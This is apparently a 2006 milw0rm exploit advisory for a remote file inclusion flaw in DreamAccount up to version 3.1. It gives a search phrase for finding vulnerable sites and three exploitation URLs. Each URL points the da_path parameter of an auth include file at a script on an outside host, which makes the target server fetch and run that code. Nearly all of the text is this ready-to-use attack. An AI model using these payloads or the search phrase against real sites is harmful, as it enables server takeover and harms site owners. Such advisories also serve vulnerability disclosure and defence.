Title: DreamAccount <= 3.1 - Remote File Include Vulnerability ----------------------------------------------------------------- Vendor: dreamcost.com URL: http://dreamcost.com ----------------------------------------------------------------- Credits: Discovered by: 'Aesthetico' http://www.majorsecurity.de ----------------------------------------------------------------- Search for: "powered by DreamAccount" ----------------------------------------------------------------- Exploitation: /auth.cookie.inc.php?da_path=http://www.yourspace.com/yourscript.php? /auth.header.inc.php?da_path=http://www.yourspace.com/yourscript.php? /auth.sessions.inc.php?da_path=http://www.yourspace.com/yourscript.php? # milw0rm.com [2006-06-05]